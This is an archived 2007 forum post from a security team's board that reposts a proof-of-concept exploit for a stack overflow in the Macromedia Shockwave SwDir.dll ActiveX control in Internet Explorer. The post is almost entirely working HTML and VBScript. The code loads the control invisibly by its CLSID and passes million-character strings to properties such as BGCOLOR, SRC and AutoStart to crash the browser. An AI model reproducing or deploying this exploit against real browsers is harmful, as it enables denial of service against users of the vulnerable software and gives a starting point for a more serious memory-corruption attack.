邪恶八进制信息安全团队技术讨论组's Archiver

pub!1c 2007-3-8 23:28

Macromedia 10.1.4.20 SwDir.dll Internet Explorer Stack Overflow DoS

[code]
<pre>
<code><span style="font: 10pt Courier New;"><span class="general1-symbol">-----------------------------------------------------------------------------
Macromedia SwDir.dll ver. 10.1.4.20 multiple methods Stack Overflow
author: shinnai
mail: shinnai[at]autistici[dot]org
site: [url]http://shinnai.altervista.org[/url]
Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
-----------------------------------------------------------------------------


<object classid=&#39;clsid:233C1507-6A77-46A4-9443-F871F945D258&#39; id=&#39;Shockwave&#39; style="WIDTH: 0px; HEIGHT: 0px" ></object>
<select style="width: 404px" name="Pucca">
<option value = "BGCOLOR">BGCOLOR</option>
<option value = "SRC">SRC</option>
<option value = "AutoStart">AutoStart</option>
<option value = "Sound">Sound</option>
<option value = "DrawLogo">DrawLogo</option>
<option value = "DrawProgress">DrawProgress</option>
<option value = "Quoting">Quoting...</option>
</select>



<input language=VBScript onclick=tryMe() type=button value="Click here to start the test">

<script language=&#39;vbscript&#39;>
Sub tryMe
on error resume next
  if Pucca.value="BGCOLOR" then
   argCount  = 1
   arg1=String(1000000, "A")
   Shockwave.BGCOLOR = arg1  
  elseif Pucca.value="SRC" then
   argCount  = 1
   arg1=String(1000000, "A")
   Shockwave.SRC = arg1
  elseif Pucca.value = "AutoStart" then
   argCount = 1
   arg1=String(1000000, "A")
   Shockwave.AutoStart = arg1
  elseif Pucca.value = "Sound" then
   argCount = 1
   arg1=String(1000000, "A")
   Shockwave.Sound = arg1
  elseif Pucca.value = "DrawLogo" then
   argCount = 1
   arg1=String(1000000, "A")
   Shockwave.DrawLogo = arg1
  elseif Pucca.value = "DrawProgress" then
   argCount = 1
   arg1=String(1000000, "A")
   Shockwave.DrawProgress = arg1
  else
   MsgBox "Hence to fight and conquer in all your battles is not supreme excellence;" & vbCrLf & _
   "supreme excellence consists in breaking the enemy&#39;s resistance without fighting."
  end if
End Sub
</script>
</span></span>
</code></pre>

[/code]

页: [1]
© 1999-2008 EvilOctal Security Team